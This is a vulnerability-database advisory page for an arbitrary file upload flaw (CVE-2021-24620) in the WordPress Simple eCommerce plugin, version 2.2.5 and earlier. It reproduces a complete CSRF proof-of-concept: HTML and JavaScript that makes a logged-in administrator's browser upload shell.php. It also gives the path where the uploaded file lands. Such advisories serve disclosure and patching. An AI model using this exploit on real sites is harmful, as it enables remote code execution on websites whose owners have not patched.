Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitFellipe OliveiraWPEX-ID:1F2B3C4A-F7E9-4D22-B71E-F6B051FD8349
HistoryAug 16, 2021 - 12:00 a.m.

Simple eCommerce <= 2.2.5 - Arbitrary File Upload

2021-08-1600:00:00
Fellipe Oliveira
396
simple ecommerce
arbitrary file upload
product upload
security exploit
web application vulnerability
javascript xmlhttprequest
file upload vulnerability

EPSS

0.001

Percentile

43.2%

JSON

The plugin does not check for the uploaded Downloadable Digital product file, allowing any file, such as PHP to be uploaded by an administrator. Furthermore, as there is no CSRF in place, attackers could also make a logged admin upload a malicious PHP file, which would lead to RCE

https://www.youtube.com/watch?v=KvXqTGvq4xQ

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/example.com\/wp-admin\/admin.php?page=simpleecommcart-products", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14024174919792965573802180262");
        xhr.withCredentials = true;
        var body = "-----------------------------14024174919792965573802180262\r\n" + 
          "Content-Disposition: form-data; name=\"simpleecommcart-action\"\r\n" + 
          "\r\n" + 
          "save product\r\n" + 
          "-----------------------------14024174919792965573802180262\r\n" + 
          "Content-Disposition: form-data; name=\"product[name]\"\r\n" + 
          "\r\n" + 
          "test\r\n" + 
          "-----------------------------14024174919792965573802180262\r\n" + 
          "Content-Disposition: form-data; name=\"product[price]\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------14024174919792965573802180262\r\n" + 
          "Content-Disposition: form-data; name=\"product[upload]\"; filename=\"shell.php\"\r\n" +
          "Content-Type: text/php\r\n" + 
          "\r\n" + 
          "\x3c?php echo \'FAILED\'; ?\x3e\n" + 
          "\r\n" + 
          "-----------------------------14024174919792965573802180262\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Save\r\n" + 
          "-----------------------------14024174919792965573802180262--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

File will be uploaded in: /wp-content/uploads/simpleecommcart/digitalproduct/shell.php

Related

cvelist 1
prion 1
wpvulndb 1
patchstack 1
nvd 1
cve 1
cvelist
cvelist
CVE-2021-24620 Simple eCommerce <= 2.2.5 - Arbitrary File Upload
2021-09-13 17:56:33
prion
prion
Cross site request forgery (csrf)
2021-09-13 18:15:00
wpvulndb
wpvulndb
Simple eCommerce <= 2.2.5 - Arbitrary File Upload
2021-08-16 00:00:00
patchstack
patchstack
WordPress Simple Ecommerce Shopping Cart plugin <= 2.2.5 - Arbitrary File Upload vulnerability
2021-08-16 00:00:00
nvd
nvd
CVE-2021-24620
2021-09-13 18:15:17
cve
cve
CVE-2021-24620
2021-09-13 18:15:17

EPSS

0.001

Percentile

43.2%

JSON
Related for WPEX-ID:1F2B3C4A-F7E9-4D22-B71E-F6B051FD8349
cvelist1prion1wpvulndb1patchstack1nvd1cve1